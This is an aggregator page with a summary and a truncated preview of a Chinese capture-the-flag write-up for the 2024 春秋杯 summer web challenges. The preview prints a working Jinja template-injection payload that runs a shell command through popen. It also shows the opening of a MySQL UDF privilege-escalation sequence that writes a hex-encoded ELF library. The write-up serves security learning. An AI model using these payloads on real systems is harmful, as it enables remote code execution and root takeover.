专栏名称: 珂技知识分享
分享自己的安全技术,渗透实例,IT知识,拒绝转载,坚持原创。
目录
相关文章推荐
今天看啥  ›  专栏  ›  珂技知识分享

2024春秋杯网络安全联赛夏季赛WP(web)

珂技知识分享  · 公众号  ·  · 2024-07-08 09:48
    

主要观点总结

这是一份关于解决一系列网络安全挑战的总结,包括使用特定工具和技术来绕过安全限制、利用漏洞、获取权限等。

关键观点总结

关键观点1: 个人赛挑战

题目涉及Web安全、PHP反序列化、JNDI、条件竞争等概念,需要利用特定漏洞和技巧来解决问题。

关键观点2: Web安全挑战

通过利用Web应用程序中的漏洞,如SSTI、条件竞争、文件包含等,进行攻击和权限提升。

关键观点3: PHP反序列化

利用PHP反序列化漏洞,通过修改序列化数据来执行任意代码,进而获取权限。

关键观点4: JNDI利用

通过JNDI(Java Naming and Directory Interface)进行攻击,利用Java应用程序的命名和目录服务来执行恶意代码。

关键观点5: 条件竞争

通过创建条件竞争,利用应用程序的并发处理来执行恶意操作或绕过安全限制。

关键观点6: 绕过安全限制

使用各种技巧和方法来绕过应用程序的安全措施,如过滤、权限校验等,以实现攻击目的。


文章预览

1.    前言 个人赛,参赛的主要都是学生,不是特别卷。因为web比较有意思,AWDP也有三道是web。虽然有的题没解出来,但除了MyCMS没时间碰,其他基本都摸的差不多了。 2.    brother 本来是最难的一道题,但因为出题者没有正确的限制mysql的文件读写权限导致被偷鸡。 一眼SSTI /?name={{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('ps aux').read()}} 本来是很难的多层权限提权题目,但看到mysql是root权限启动后就觉得可以偷。 api.py里有mysql账户密码,而且ctf是root权限,且secure_file_priv为空。一眼udf提权,直接掏出珍藏多年的linux udf脚本搞定。 show global variables like '%secure_file_priv%'; show variables like '%plugin%'; select * from func; select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览